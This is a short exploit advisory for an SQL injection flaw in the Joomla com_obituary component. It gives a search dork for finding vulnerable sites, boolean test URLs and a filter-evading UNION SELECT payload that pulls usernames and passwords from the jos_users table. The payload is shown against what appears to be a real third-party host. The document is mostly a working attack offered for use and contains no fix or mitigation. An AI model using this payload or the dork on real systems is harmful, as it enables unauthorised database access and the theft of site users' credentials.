<------------------- header data start ------------------- >
#############################################################
Joomla Component (com_obituary) SQL Injection Vulnerability
#############################################################

# Author : BlackApple ~ Bug Researchers

# Date : 01.07.2011

# Name : Joomla Component (com_obituary)

# Bug Type : SQL Injection Vulnerability

# Search Shape: inurl:com_obituary

[+] Demo: http://localhost/[PATH]/index.php?option=com_obituary&view=guestbook&id=1 and 1=1

http://localhost/[PATH]/index.php?option=com_obituary&view=guestbook&id=1 and 1=2

http://localhost/[PATH]/index.php?option=com_obituary&view=guestbook&id=[SQL]

For example; http://clients.skoolsonline.com/obituary/index.php?option=com_obituary&view=guestbook&id=3 /*!union*/ /*!select*/ 0,unhex(hex(username)),2,3,unhex(hex(password)),5,6,7,8,9,10,11,12,13,14,15 from jos_users


#############################################################